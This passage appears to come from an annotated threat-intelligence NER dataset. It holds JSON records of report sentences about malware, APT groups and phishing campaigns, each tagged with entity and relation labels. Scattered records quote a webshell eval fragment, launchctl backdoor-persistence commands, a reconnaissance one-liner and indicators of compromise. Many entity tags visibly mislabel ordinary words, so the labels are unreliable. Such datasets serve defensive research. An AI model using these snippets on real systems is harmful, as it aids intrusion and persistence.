network.","entities":[{"id":23857,"label":"location","start_offset":55,"end_offset":60},{"id":23858,"label":"location","start_offset":105,"end_offset":115},{"id":23859,"label":"location","start_offset":119,"end_offset":123},{"id":23860,"label":"attack-pattern","start_offset":139,"end_offset":153},{"id":23861,"label":"location","start_offset":167,"end_offset":170}],"relations":[],"Comments":[]} {"id":14031,"text":"As such, not all samples may have the embedded resource that leaks the same OS language.","entities":[],"relations":[],"Comments":[]} {"id":3300,"text":" Figure 21.","entities":[],"relations":[],"Comments":[]} {"id":5373,"text":"Blink","entities":[{"id":51369,"label":"malware","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":130,"text":" The malicious activity itself doesn\u2019t cause long-term damage to systems, and ends as soon as users leave the malicious or compromised site.","entities":[],"relations":[],"Comments":[]} {"id":4654,"text":"Again, the response is expected to be \"OK\".","entities":[],"relations":[],"Comments":[]} {"id":681,"text":" Microsoft Equation Editor","entities":[{"id":45798,"label":"SOFTWARE","start_offset":1,"end_offset":26}],"relations":[],"Comments":[]} {"id":11742,"text":"Moreover, to protect our users, we have referred the below activity to the FBI for further investigation.","entities":[],"relations":[],"Comments":[]} {"id":7853,"text":"If an attacker has control over a PC, which the Android device is attached to (for charging or for other purposes), they don\u2019t need to get physical access to the phone.","entities":[],"relations":[],"Comments":[]} {"id":3778,"text":" Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":49616,"label":"identity","start_offset":116,"end_offset":145},{"id":49613,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} {"id":4830,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor\u2019s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":50783,"label":"identity","start_offset":71,"end_offset":78},{"id":50785,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50786,"label":"tools","start_offset":257,"end_offset":270},{"id":50784,"label":"identity","start_offset":136,"end_offset":175},{"id":14710,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":14713,"label":"threat-actor","start_offset":82,"end_offset":90}],"relations":[{"id":1015,"from_id":14713,"to_id":14710,"type":"duplicate-of"},{"id":1016,"from_id":14710,"to_id":50784,"type":"targets"},{"id":1017,"from_id":14710,"to_id":50785,"type":"uses"},{"id":1018,"from_id":14710,"to_id":50786,"type":"uses"}],"Comments":[]} {"id":13201,"text":"Hey!","entities":[],"relations":[],"Comments":[]} {"id":13021,"text":"As always, we continue to publish details surrounding the actions we take against coordinated influence operations in our quarterly TAG bulletin.","entities":[],"relations":[],"Comments":[]} {"id":673,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":8034,"text":"Credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate \u2013 as they know it's difficult for users to detect this kind of attack.","entities":[{"id":24923,"label":"attack-pattern","start_offset":11,"end_offset":19},{"id":24924,"label":"location","start_offset":79,"end_offset":83}],"relations":[],"Comments":[]} {"id":4626,"text":"As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.","entities":[{"id":50537,"label":"identity","start_offset":55,"end_offset":61},{"id":50538,"label":"threat-actor","start_offset":132,"end_offset":137},{"id":50539,"label":"threat-actor","start_offset":142,"end_offset":157},{"id":50540,"label":"location","start_offset":162,"end_offset":169},{"id":50536,"label":"identity","start_offset":11,"end_offset":14}],"relations":[{"id":980,"from_id":50538,"to_id":50540,"type":"located-at"},{"id":981,"from_id":50539,"to_id":50540,"type":"located-at"}],"Comments":[]} {"id":8857,"text":"A closer look at PlugX svchost injection","entities":[{"id":27412,"label":"tools","start_offset":17,"end_offset":22}],"relations":[],"Comments":[]} {"id":1140,"text":"The first thing our researchers noticed was the similarity between this mutex name and the previous one.","entities":[],"relations":[],"Comments":[]} {"id":570,"text":"Some Virlock variants ask for more ransom, such as 0.771 BTC, 1.008 BTC or more.","entities":[{"id":44782,"label":"malware","start_offset":5,"end_offset":12}],"relations":[],"Comments":[]} {"id":4715,"text":"We remediated the compromises for these users and implemented controls to protect all Android users.","entities":[{"id":50609,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} {"id":14017,"text":"However, there is a secondary effect when the version resource is added to a binary.","entities":[],"relations":[],"Comments":[]} {"id":14323,"text":"Code snippet of the malicious extension plugin Connection between Round Year Fun and Maikspy","entities":[{"id":48547,"label":"malware","start_offset":85,"end_offset":92}],"relations":[],"Comments":[]} {"id":3392,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 36e3fcd6a4c7c9db985be77ea6394b2ed019332fdae4739df2f96a541ea52617 Silverlight.exe","entities":[{"id":10242,"label":"malware","start_offset":0,"end_offset":11},{"id":10243,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49045,"label":"malware","start_offset":20,"end_offset":44},{"id":49046,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":596,"from_id":10242,"to_id":49045,"type":"duplicate-of"},{"id":597,"from_id":49046,"to_id":10243,"type":"duplicate-of"},{"id":598,"from_id":49046,"to_id":49045,"type":"indicates"},{"id":599,"from_id":10243,"to_id":49045,"type":"indicates"}],"Comments":[]} {"id":9659,"text":"Property list with persistence settings launchctl load \/Library\/LaunchDaemons\/filename.plist > \/dev\/nul or launchctl load ~\/Library\/LaunchAgents\/ filename.plist > \/dev\/nul will then command the operating system to start the dropped backdoor file at login.","entities":[{"id":29553,"label":"location","start_offset":9,"end_offset":13},{"id":29554,"label":"attack-pattern","start_offset":40,"end_offset":49},{"id":29555,"label":"location","start_offset":50,"end_offset":54},{"id":29556,"label":"attack-pattern","start_offset":107,"end_offset":116},{"id":29557,"label":"location","start_offset":117,"end_offset":121},{"id":29558,"label":"location","start_offset":172,"end_offset":176},{"id":29559,"label":"location","start_offset":214,"end_offset":219}],"relations":[],"Comments":[]} {"id":12605,"text":"Arrival Vector","entities":[{"id":39188,"label":"tools","start_offset":8,"end_offset":14}],"relations":[],"Comments":[]} {"id":1187,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":7309,"text":"TCP stream excerpt of the malware receiving commands from C&C server","entities":[],"relations":[],"Comments":[]} {"id":7690,"text":".LNK shortcut in .ISO file","entities":[],"relations":[],"Comments":[]} {"id":8026,"text":"In this blog, we explore some of the most notable campaigns we\u2019ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":24889,"label":"location","start_offset":37,"end_offset":41},{"id":24893,"label":"attack-pattern","start_offset":181,"end_offset":189}],"relations":[],"Comments":[]} {"id":6898,"text":"Upon reviewing phishing attempts since the beginning of this year, we\u2019ve seen a rising number of attackers, including those from Iran and North Korea, impersonating news outlets or journalists.","entities":[{"id":21584,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":21587,"label":"location","start_offset":134,"end_offset":137}],"relations":[],"Comments":[]} {"id":1513,"text":" \"dns.po888.com|122.228.242.51|119.145.148.56|162.221.13.82\".","entities":[{"id":46781,"label":"DOMAIN","start_offset":2,"end_offset":15},{"id":46782,"label":"IPV4","start_offset":16,"end_offset":30},{"id":46783,"label":"IPV4","start_offset":31,"end_offset":45},{"id":46784,"label":"IPV4","start_offset":46,"end_offset":59}],"relations":[],"Comments":[]} {"id":3216,"text":" Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":3828,"text":"Variable}.WMI.createProcess Creates specified process {Variable}.shell File\/Process Execution functions {Variable}.shell.run Run commands {Variable}.shell.exec Executes process {Variable}.file File-related functions {Variable}.file.getPath Get specified file path {Variable}.file.readText Reads specified text file {Variable}.file.get32BitFolder Get System Folder (32\/64-bit) {Variable}.file.writol Writes on specified file {Variable}.file.deleteFile Deletes specified file {Variable}.file.readBinary Reads specified binary file. Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3111,"text":" The greatest area of risk is in shared-hosting scenarios.","entities":[],"relations":[],"Comments":[]} {"id":6938,"text":" Figure 3. An example of a coronavirus-related spear-phishing email attachment Once the victim downloads the malicious macro, it will decrypt an embedded executable dropper that is hidden inside a text box, which will then be saved to a hardcoded path prior to it executing in the machine. Figure 4. Malicious macro that decrypts an executable hidden inside a text box Figure 5. Examples of encrypted Crimson RAT executables hidden inside text boxes Once the executable file is executed, it will proceed to unzip a file named mdkhm.zip and then execute a Crimson RAT executable named dlrarhsiva.exe.","entities":[{"id":21716,"label":"location","start_offset":52,"end_offset":57},{"id":21717,"label":"attack-pattern","start_offset":58,"end_offset":66},{"id":21718,"label":"location","start_offset":138,"end_offset":142},{"id":21719,"label":"location","start_offset":222,"end_offset":226},{"id":21722,"label":"malware","start_offset":420,"end_offset":431},{"id":21723,"label":"location","start_offset":514,"end_offset":518},{"id":21724,"label":"location","start_offset":559,"end_offset":562},{"id":21725,"label":"malware","start_offset":578,"end_offset":589}],"relations":[],"Comments":[]} {"id":8339,"text":"A log file is written containing a count of the emails that were downloaded.","entities":[],"relations":[],"Comments":[]} {"id":11586,"text":"In collaboration with TAG, Project Zero has published the technical analysis of CVE-2021-30983.","entities":[],"relations":[],"Comments":[]} {"id":4856,"text":"This hack-for-hire actor has been publicly referred to as 'Void Balaur'.","entities":[{"id":50838,"label":"attack-pattern","start_offset":5,"end_offset":18},{"id":14831,"label":"threat-actor","start_offset":59,"end_offset":70}],"relations":[],"Comments":[]} {"id":2247,"text":"When the previously mentioned C2 response is both decoded and decrypted, we are presented with the following data: The command structure of the C2 response always begins with the string \u2018tick\u2019","entities":[],"relations":[],"Comments":[]} {"id":217,"text":"The .onion site links to an entity calling themselves \u201cFree Civilian\u201d and offering to sell databases containing the personal data of Ukrainian citizens.","entities":[],"relations":[],"Comments":[]} {"id":1936,"text":" Urpage Bahamut Confucius Patchwork \"BioData\" Delphi backdoor and file stealer X X X VB backdoor X Android \"Bahamut-like\" malware X X X Custom Android malware X AndroRAT Android malware X InPage malicious documents X X simply obfuscated HTA downloaders X X IOS malware X Confucius malware X remote-access-c3 backdoor X Sneepy\/Byebye shell malware X Python cloud filestealers X AllaKore RAT X Badnews malware X QuasarRAT X NDiskMonitor malware X Targets","entities":[{"id":5685,"label":"threat-actor","start_offset":3,"end_offset":9},{"id":5686,"label":"threat-actor","start_offset":10,"end_offset":17},{"id":5687,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":5688,"label":"threat-actor","start_offset":28,"end_offset":37},{"id":5689,"label":"malware","start_offset":39,"end_offset":46},{"id":5693,"label":"malware","start_offset":118,"end_offset":125},{"id":5694,"label":"malware","start_offset":179,"end_offset":187},{"id":5695,"label":"threat-actor","start_offset":309,"end_offset":318},{"id":5697,"label":"malware","start_offset":369,"end_offset":375},{"id":5700,"label":"malware","start_offset":439,"end_offset":451},{"id":5701,"label":"malware","start_offset":460,"end_offset":467},{"id":5702,"label":"malware","start_offset":484,"end_offset":493},{"id":5703,"label":"malware","start_offset":502,"end_offset":514},{"id":47059,"label":"SOFTWARE","start_offset":155,"end_offset":162},{"id":47060,"label":"malware","start_offset":376,"end_offset":382}],"relations":[],"Comments":[]} {"id":410,"text":" This surge in unauthorized coin mining is driven, in large part, by the recent skyrocketing in the value of digital currencies like bitcoin.","entities":[{"id":46107,"label":"SOFTWARE","start_offset":133,"end_offset":140},{"id":46108,"label":"attack-pattern","start_offset":15,"end_offset":39}],"relations":[],"Comments":[]} {"id":3804,"text":"Auto Update","entities":[],"relations":[],"Comments":[]} {"id":14316,"text":"Code snippets of the scanning, fetching, and uploading of .jpg, .jpeg, .png, .txt, .wav, .html, .doc, .docx and .rtf files (left).","entities":[],"relations":[],"Comments":[]} {"id":2960,"text":"The faster the good guys track these down and get them patched, the harder we make the lives of the criminals looking to exploit them.","entities":[],"relations":[],"Comments":[]} {"id":261,"text":"We also found that these fake download campaigns rotate domains to distribute the same malicious binaries.","entities":[{"id":44664,"label":"attack-pattern","start_offset":25,"end_offset":38},{"id":44665,"label":"attack-pattern","start_offset":87,"end_offset":105}],"relations":[],"Comments":[]} {"id":14107,"text":"Screenshot functionality comparison between SLUB and APT37 Working Hours","entities":[{"id":43645,"label":"malware","start_offset":44,"end_offset":48},{"id":43647,"label":"threat-actor","start_offset":53,"end_offset":58}],"relations":[],"Comments":[]} {"id":2780,"text":"The tool is designed to \u201cmine\u201d cryptocurrencies, that is it earns credit in the cryptocurrency in exchange for computing power that is used to power the cryptocurrencies\u2019 digital infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":139,"text":"In our updated report on ransomware from Unit 42, \u201cRansomware: Unlocking the Lucrative Criminal Business Model,\u201d Unit 42 researcher Bryan Lee notes: \u201cIn 2016, it was thought that there were less than one hundred active ransomware variants out in the wild.","entities":[{"id":45846,"label":"identity","start_offset":41,"end_offset":48},{"id":45847,"label":"TIME","start_offset":153,"end_offset":157},{"id":45844,"label":"identity","start_offset":113,"end_offset":120},{"id":45845,"label":"identity","start_offset":132,"end_offset":141}],"relations":[],"Comments":[]} {"id":4056,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":4041,"text":" Figure 2. Timestomping used on the bin file The decryption key is used as an argument of Nerapack and various keys are used on different victims.","entities":[{"id":49893,"label":"malware","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} {"id":2322,"text":"After the WebKit RCE succeeds, an embedded Mach-O binary is loaded into memory, patched, and run.","entities":[{"id":47397,"label":"SOFTWARE","start_offset":10,"end_offset":16}],"relations":[],"Comments":[]} {"id":13488,"text":"These channels were mostly uploading spammy, non-political content, but a small subset posted primarily Chinese-language political content similar to the findings of a recent Graphika report.","entities":[],"relations":[],"Comments":[]} {"id":3634,"text":"Rather than simply using a theme or lure that is relevant to the target, the attackers behind these attacks use an email conversation that\u2019s in progress to carry out their attack.","entities":[],"relations":[],"Comments":[]} {"id":13270,"text":"Figure 7.","entities":[],"relations":[],"Comments":[]} {"id":6084,"text":"The loader can be recognized by its use of a unique user-agent \u201cbumblebee\u201d which both variants share.","entities":[{"id":18780,"label":"location","start_offset":11,"end_offset":14},{"id":18781,"label":"malware","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} {"id":1816,"text":"Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.","entities":[{"id":46933,"label":"SOFTWARE","start_offset":24,"end_offset":46}],"relations":[],"Comments":[]} {"id":5542,"text":"Developing new skimming code which is usable across as many different payment pages as possible.","entities":[{"id":51538,"label":"attack-pattern","start_offset":15,"end_offset":28}],"relations":[],"Comments":[]} {"id":1268,"text":"Figure 3 shows a GIF file containing an obituary notice for a woman, while Figure 4 shows a Microsoft Word document containing the obituary of a man.","entities":[{"id":46643,"label":"SOFTWARE","start_offset":92,"end_offset":106}],"relations":[],"Comments":[]} {"id":2481,"text":"Inbound attempts to exploit the SpringShell vulnerability from 194.31.98[.]186 attempted to install the webshell from the original proof-of-concept seen in Figure 14.","entities":[{"id":45533,"label":"IPV4","start_offset":63,"end_offset":78},{"id":47557,"label":"attack-pattern","start_offset":104,"end_offset":112},{"id":47558,"label":"vulnerability","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} {"id":10285,"text":"Code snippets showing keylogs This secondary payload does not have any function to upload the collected keystrokes back to the attacker.","entities":[],"relations":[],"Comments":[]} {"id":939,"text":" While not all SMS-based IAP applications steal user data, we recently identified that the Chinese Taomike SDK has begun capturing copies of all messages received by the phone and sending them to a Taomike controlled server.","entities":[{"id":46449,"label":"location","start_offset":91,"end_offset":98},{"id":44904,"label":"attack-pattern","start_offset":42,"end_offset":57},{"id":44905,"label":"malware","start_offset":99,"end_offset":110},{"id":44907,"label":"Infrastucture","start_offset":198,"end_offset":223}],"relations":[{"id":37,"from_id":44905,"to_id":44907,"type":"exfiltrates-to"},{"id":38,"from_id":44905,"to_id":44907,"type":"communicates-with"},{"id":190,"from_id":44905,"to_id":46449,"type":"located-at"},{"id":191,"from_id":44905,"to_id":44904,"type":"uses"}],"Comments":[]} {"id":10251,"text":"These brute force attacks started in 2019, and then we could firmly attribute them to Pawn Storm because we could cross-relate the extensive probing of Microsoft Autodiscover servers around the world with high-confidence indicators of the group\u2019s more traditional attack methods (spear phishing and credential phishing).","entities":[{"id":31324,"label":"attack-pattern","start_offset":6,"end_offset":17},{"id":31326,"label":"location","start_offset":43,"end_offset":46},{"id":31327,"label":"location","start_offset":78,"end_offset":82},{"id":31328,"label":"threat-actor","start_offset":86,"end_offset":96},{"id":31329,"label":"location","start_offset":114,"end_offset":119},{"id":31332,"label":"location","start_offset":194,"end_offset":199},{"id":31333,"label":"location","start_offset":210,"end_offset":220},{"id":31334,"label":"attack-pattern","start_offset":280,"end_offset":294},{"id":31335,"label":"location","start_offset":295,"end_offset":298},{"id":31336,"label":"attack-pattern","start_offset":310,"end_offset":318}],"relations":[],"Comments":[]} {"id":10485,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} {"id":6742,"text":"One notable campaign attempted to target personal accounts of U.S. government employees with phishing lures using American fast food franchises and COVID-19 messaging.","entities":[{"id":21033,"label":"location","start_offset":12,"end_offset":20},{"id":21034,"label":"location","start_offset":34,"end_offset":40},{"id":21036,"label":"attack-pattern","start_offset":93,"end_offset":101},{"id":21038,"label":"location","start_offset":144,"end_offset":147}],"relations":[],"Comments":[]} {"id":1065,"text":"But until now, based on the latest research in the IEEE Security & Privacy paper, everyone has believed that malicious apps attempting to carry out overlay attacks must overcome two significant hurdles to be successful: These are significant mitigating factors and so overlay attacks haven\u2019t been reckoned a serious threat.","entities":[{"id":46549,"label":"identity","start_offset":51,"end_offset":55},{"id":44929,"label":"attack-pattern","start_offset":269,"end_offset":284},{"id":44930,"label":"attack-pattern","start_offset":148,"end_offset":163}],"relations":[],"Comments":[]} {"id":6632,"text":" The DarkHydrus threat group has targeted government entities and educational institutions with spear-phishing attacks and credential harvesting campaigns.","entities":[{"id":20576,"label":"threat-actor","start_offset":5,"end_offset":15},{"id":20577,"label":"location","start_offset":62,"end_offset":65},{"id":20578,"label":"location","start_offset":96,"end_offset":101},{"id":20579,"label":"attack-pattern","start_offset":102,"end_offset":110},{"id":20580,"label":"location","start_offset":119,"end_offset":122}],"relations":[],"Comments":[]} {"id":12578,"text":"The exception indicates that Apple added generic protections in Big Sur which rendered this exploit useless.","entities":[],"relations":[],"Comments":[]} {"id":2554,"text":"The answer is simple: credential theft.","entities":[{"id":47748,"label":"attack-pattern","start_offset":22,"end_offset":38}],"relations":[],"Comments":[]} {"id":11253,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[],"relations":[],"Comments":[]} {"id":75,"text":"There is no single solution to stopping these attacks, but the same technologies and policies you use to prevent other malware infections will be effective.","entities":[{"id":44590,"label":"attack-pattern","start_offset":119,"end_offset":137}],"relations":[],"Comments":[]} {"id":1163,"text":"And indeed, as with the second hypothesis, standard virus detection logs prove that each of these mutexes do span multiple variants of the worm.","entities":[],"relations":[],"Comments":[]} {"id":3138,"text":"They\u2019re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life.","entities":[{"id":48266,"label":"identity","start_offset":24,"end_offset":71}],"relations":[],"Comments":[]} {"id":818,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":7686,"text":"Figure 1. Infection chains for ServHelper installation Figure 2.","entities":[{"id":23911,"label":"malware","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} {"id":2211,"text":"The parent process check is not used in this particular sample.","entities":[],"relations":[],"Comments":[]} {"id":4136,"text":"With these tools, the attackers accomplish their goals (network discovery, access to the intranet, and exfiltration) step by step.","entities":[],"relations":[],"Comments":[]} {"id":13209,"text":" The overview provided above highlights how putting critical information in physically isolated networks is not a bulletproof solution for defending against cyberespionage.","entities":[],"relations":[],"Comments":[]} {"id":13086,"text":"This burgeoning world of connected IoT devices is particularly advanced in the manufacturing space, where huge gains are already being made.","entities":[],"relations":[],"Comments":[]} {"id":3983,"text":"The compromised software will then put the customer's data or system at risk.","entities":[],"relations":[],"Comments":[]} {"id":6512,"text":"We observed it operating in the following countries: Azerbaijan Bahrain Israel Saudi Arabia United Arab Emirates Figure 11.","entities":[],"relations":[],"Comments":[]} {"id":12520,"text":"Full details of Glupteba\u2019s network protocol can be found in this report from 2020, the following Python script illustrates how one can decrypt an encrypted domain name:","entities":[{"id":38979,"label":"malware","start_offset":16,"end_offset":24},{"id":38980,"label":"location","start_offset":44,"end_offset":47},{"id":38982,"label":"location","start_offset":127,"end_offset":130},{"id":38983,"label":"location","start_offset":131,"end_offset":134}],"relations":[],"Comments":[]} {"id":14078,"text":"The malware campaigns previously attributed to APT37 also extensively used the exploitation of web sites hosted with GNUBoard CMS.","entities":[{"id":48157,"label":"SOFTWARE","start_offset":117,"end_offset":126},{"id":43567,"label":"threat-actor","start_offset":47,"end_offset":52}],"relations":[],"Comments":[]} {"id":7858,"text":"For these devices, ADB debugging must be enabled for backup to work.","entities":[],"relations":[],"Comments":[]} {"id":8999,"text":"We also noticed network communications from this victim to a subdomain of Earth Berberoka, suggesting it could have been previously compromised by this threat actor.","entities":[],"relations":[],"Comments":[]} {"id":2536,"text":"When Ireland's healthcare system refused to pay any ransom, Conti provided the agency with what it said was a free decryption key.","entities":[{"id":47728,"label":"location","start_offset":5,"end_offset":12},{"id":47729,"label":"attack-pattern","start_offset":60,"end_offset":65}],"relations":[],"Comments":[]} {"id":2012,"text":"Tox is a peer-to-peer instant messaging protocol that offers end-to-end encryption and has been observed being used by other ransomware groups for negotiations.","entities":[],"relations":[],"Comments":[]} {"id":13701,"text":"Scrutinize all emails.","entities":[],"relations":[],"Comments":[]} {"id":3070,"text":"This is the main reason we classify the program as Scareware rather than just Fake AV.","entities":[],"relations":[],"Comments":[]} {"id":8133,"text":"Code enable accessibility permission of the newly installed app","entities":[],"relations":[],"Comments":[]} {"id":3819,"text":"The table below lists all of Koadic's functions: {Variable}.user User-related functions {Variable}.user.isElevated Check Privilege {Variable}.user.OS Get OS Version {Variable}.user.DC","entities":[{"id":11597,"label":"malware","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} {"id":14191,"text":"Already the Conti and Lockbit ransomware collectives have stated their support.","entities":[{"id":48229,"label":"threat-actor","start_offset":12,"end_offset":18},{"id":48230,"label":"threat-actor","start_offset":22,"end_offset":30}],"relations":[],"Comments":[]} {"id":3921,"text":"var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(\"dW5zYWZl\")); var c=eval(a,b); eval(c,b); %>","entities":[],"relations":[],"Comments":[]} {"id":7304,"text":"Get serial number ifconfig -l ifconfig | awk '\/ether \/{print $2}' 2>&1 Get network interface MAC addresses Table 2.","entities":[{"id":22764,"label":"tools","start_offset":21,"end_offset":29},{"id":22765,"label":"tools","start_offset":33,"end_offset":41}],"relations":[],"Comments":[]} {"id":7179,"text":" Figure 1. Watering hole reconnaissance flow Analysis of the Andariel techniques","entities":[{"id":22443,"label":"location","start_offset":20,"end_offset":24},{"id":22444,"label":"threat-actor","start_offset":61,"end_offset":69}],"relations":[],"Comments":[]} {"id":1756,"text":"After his slides were released, researchers began working to determine what the missing parts were.","entities":[],"relations":[],"Comments":[]} {"id":624,"text":"This is the same exploit the WanaCrypt0r\/WannaCry malware exploited to spread globally in May, 2017.","entities":[{"id":2086,"label":"malware","start_offset":29,"end_offset":40},{"id":2087,"label":"malware","start_offset":41,"end_offset":49},{"id":44808,"label":"TIME","start_offset":90,"end_offset":99}],"relations":[],"Comments":[]} {"id":6526,"text":"PDF.RemoteUtilities.A","entities":[],"relations":[],"Comments":[]} {"id":4753,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[],"relations":[],"Comments":[]} {"id":4181,"text":"Information on how a threat enters and operates within a victim\u2019s network is invaluable to security teams and can help them create more effective protection for vulnerable organizations.","entities":[],"relations":[],"Comments":[]} {"id":3193,"text":" Figure 4.","entities":[],"relations":[],"Comments":[]} {"id":6081,"text":"These samples have some indicators that suggest they were custom-built to be used by the group.","entities":[],"relations":[],"Comments":[]} {"id":9781,"text":"The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents.","entities":[{"id":29793,"label":"location","start_offset":33,"end_offset":37},{"id":29794,"label":"attack-pattern","start_offset":53,"end_offset":67}],"relations":[],"Comments":[]} {"id":14148,"text":"Cybercriminals and malicious hackers have been shifting their tactics, techniques, and procedures (TTPs) to improve their ability to infiltrate an organization and stay under the radar of security professionals and solutions.","entities":[],"relations":[],"Comments":[]} {"id":1225,"text":"One piece is embedded into Android apps or games for developers as a part of the source code.","entities":[{"id":46608,"label":"SOFTWARE","start_offset":27,"end_offset":34}],"relations":[],"Comments":[]} {"id":10098,"text":"This was done as part of the build process; the source code repository was not affected.","entities":[{"id":30792,"label":"attack-pattern","start_offset":48,"end_offset":54}],"relations":[],"Comments":[]} {"id":275,"text":" We have released public reports on the WhisperGate attacks and the infrastructure and tactics used by the Gamaredon group.","entities":[{"id":45965,"label":"malware","start_offset":40,"end_offset":51},{"id":45966,"label":"threat-actor","start_offset":107,"end_offset":122}],"relations":[],"Comments":[]} {"id":379,"text":"Conclusion Indicators of Compromise ","entities":[],"relations":[],"Comments":[]} {"id":4497,"text":"The actors behind this campaign, which we attributed to a government-backed entity based in North Korea, have employed a number of means to target researchers.","entities":[{"id":50299,"label":"campaign","start_offset":23,"end_offset":31},{"id":50300,"label":"location","start_offset":92,"end_offset":103}],"relations":[{"id":942,"from_id":50299,"to_id":50300,"type":"attributed-to"}],"Comments":[]} {"id":1658,"text":" NetWire uses a custom, TCP-based protocol.","entities":[{"id":4926,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":5904,"text":"Jon:","entities":[],"relations":[],"Comments":[]} {"id":5675,"text":"Parallel to the analysis, tracking, and technical disruption of this botnet, Google has filed a lawsuit against two individuals believed to be located in Russia for operating the Glupteba Botnet and its various criminal schemes.","entities":[{"id":17489,"label":"location","start_offset":36,"end_offset":39},{"id":17493,"label":"malware","start_offset":179,"end_offset":187},{"id":17494,"label":"location","start_offset":195,"end_offset":198}],"relations":[],"Comments":[]} {"id":909,"text":"The RC4 key is generated by concatenating the SHA256 value previously generated with the path to the file being encrypted.","entities":[],"relations":[],"Comments":[]} {"id":1269,"text":" Figure 3. Japanese decoy document containing an obituary notice for a woman.","entities":[{"id":44959,"label":"attack-pattern","start_offset":20,"end_offset":34}],"relations":[],"Comments":[]} {"id":5431,"text":"Access to these services should be limited, which can be achieved by configuring a virtual private network (VPN) that can access those services remotely.","entities":[],"relations":[],"Comments":[]} {"id":3748,"text":" CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.","entities":[{"id":49573,"label":"attack-pattern","start_offset":19,"end_offset":46},{"id":49574,"label":"attack-pattern","start_offset":68,"end_offset":98},{"id":49572,"label":"vulnerability","start_offset":1,"end_offset":15},{"id":49575,"label":"SOFTWARE","start_offset":102,"end_offset":150}],"relations":[{"id":830,"from_id":49575,"to_id":49572,"type":"has"},{"id":831,"from_id":49572,"to_id":49573,"type":"uses"},{"id":832,"from_id":49572,"to_id":49574,"type":"uses"}],"Comments":[]} {"id":12989,"text":"Malware samples:","entities":[],"relations":[],"Comments":[]} {"id":2702,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":8673,"text":"The exploit targeted iOS versions 12.4 through 13.7.","entities":[],"relations":[],"Comments":[]} {"id":2668,"text":" When looking at leak site data across all ransomware families, we\u2019ve observed LockBit 2.0 targeting the highest number of organizations in the following regions: JAPAC, EMEA, and LATAM.","entities":[{"id":47862,"label":"location","start_offset":163,"end_offset":168},{"id":47863,"label":"location","start_offset":170,"end_offset":174},{"id":47864,"label":"location","start_offset":180,"end_offset":185},{"id":47861,"label":"threat-actor","start_offset":79,"end_offset":90}],"relations":[],"Comments":[]} {"id":955,"text":"We have captured around 63,000 Android apps in WildFire that include the Taomike library but only around 18,000 include the SMS theft functionality.","entities":[{"id":2996,"label":"SOFTWARE","start_offset":47,"end_offset":55},{"id":46463,"label":"identity","start_offset":73,"end_offset":80},{"id":46464,"label":"attack-pattern","start_offset":124,"end_offset":133}],"relations":[],"Comments":[]} {"id":2,"text":"The attack vector is very basic and repeats itself: It begins with a spear phishing email sent with SCR attachments (double zipped).","entities":[{"id":48941,"label":"attack-pattern","start_offset":69,"end_offset":115}],"relations":[],"Comments":[]} {"id":10013,"text":"Indicators of Compromise (IoCs): Related hashes (SHA-256): 0703a917aaa0630ae1860fb5fb1f64f3cfb4ea8c57eac71c2b0a407b738c4e19 (ShiftDoor) \u2014 detected by Trend Micro as BKDR_SETHC.D c14ea9b81f782ba36ae3ea450c2850642983814a0f4dc0ea4888038466839c1e (aio.exe)","entities":[{"id":30587,"label":"SHA2","start_offset":60,"end_offset":124},{"id":30589,"label":"MD5","start_offset":179,"end_offset":243}],"relations":[],"Comments":[]} {"id":7300,"text":" Figure 10. Encrypted strings Figures 11-12.","entities":[],"relations":[],"Comments":[]} {"id":5131,"text":"East\/west is within the network itself.","entities":[],"relations":[],"Comments":[]} {"id":11842,"text":"Since first discovering this activity, OpenSUpdater's authors have tried other variations on invalid encodings to further evade detection.","entities":[{"id":36511,"label":"malware","start_offset":39,"end_offset":51}],"relations":[],"Comments":[]} {"id":13853,"text":"This article has been updated to add references to the DarkSide victim 